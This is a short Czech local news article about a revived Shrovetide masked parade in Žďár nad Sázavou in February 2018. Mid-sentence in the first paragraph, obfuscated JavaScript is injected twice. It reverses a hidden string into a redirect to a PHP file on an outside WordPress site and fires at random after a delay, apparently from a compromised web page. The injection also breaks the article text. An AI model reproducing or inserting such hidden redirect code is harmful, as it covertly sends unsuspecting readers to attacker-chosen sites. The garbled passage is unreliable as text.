Rainbow page separator

Žďárem po dlouhých desetiletích opět projde masopustní průvod

Středa, 7. února 2018

Žďár nad Sázavou / Obnovený masopustní průvod se v sobotu 10. února uskuteční ve Žďáře. První ročník kulturně-společenské akce navazuje na tradici průvodů masek ve městě v šedesátých letech minulého s[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toletí, podílet se na něm budou také žáci a zaměstnanci základní školy ve Švermově ulici a základní umělecké školy Františka Drdly.
Přijít se však pobavit s ostatními účastníky průvodu může úplně každý, ať už v masce, anebo bez ní. Obnovenou masopustní veselici rovněž finančně podpořila žďárská radnice.
„Sraz účastníků v maskách bude v sobotu 10. února před divadlem ve 14.14 hodin. Vydáme se Nádražní ulicí směrem na náměstí Republiky,“ pozvala za pořadatele průvodu Lenka Šimo.
Průvod pak dorazí před Starou radnici, kde bude pro všechny zájemce připraveno občerstvení.